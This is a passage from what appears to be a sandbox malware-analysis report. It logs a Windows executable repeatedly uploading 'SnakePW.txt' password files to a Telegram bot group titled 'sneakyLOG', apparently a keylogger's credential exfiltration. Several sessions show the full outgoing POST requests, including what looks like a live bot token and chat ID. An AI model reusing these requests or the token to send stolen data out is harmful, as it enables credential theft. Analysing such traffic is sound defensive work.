2024-09-27 10:54:32 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 64 33 61 35 61 30 34 62 39 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfd3a5a04b9e9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:32 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:32 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36938,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434472,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	49815	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:33 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfd8dd3173e73 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:33 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 64 38 64 64 33 31 37 33 65 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfd8dd3173e73Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:33 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:33 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 33 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36939,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434473,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	49816	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:33 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcffa729a7b8c8 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:33 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 66 61 37 32 39 61 37 62 38 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcffa729a7b8c8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:34 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:34 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36940,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434474,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	49817	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:35 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd000d068243f5 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:35 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 30 64 30 36 38 32 34 33 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dd000d068243f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:35 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:35 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 35 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36942,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434475,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	49818	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:36 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd006e6712ef2c Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:36 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 36 65 36 37 31 32 65 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dd006e6712ef2cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:39 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:40 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36943,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434479,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	49819	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:52 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd01d1473ef670 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:52 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 64 31 34 37 33 65 66 36 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dd01d1473ef670Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:54 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:54 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 28 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:54 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 38 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 28","parameters":{"retry_after":28}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	49820	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:55:11 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd098f10ba3de7 Host: api.telegram.org Content-Length: 551
2024-09-27 10:55:11 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 38 66 31 30 62 61 33 64 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dd098f10ba3de7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:55:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:55:45 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:55:45 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 35 34 35 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36968,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434545,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	49821	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:56:02 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd26e1095c47bd Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:56:02 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 65 31 30 39 35 63 34 37 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dd26e1095c47bdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:56:03 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:56:03 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 22 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:56:03 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}

Target ID:	4
Start time:	06:52:04
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\.05.2024.exe
Wow64 process (32bit):	true
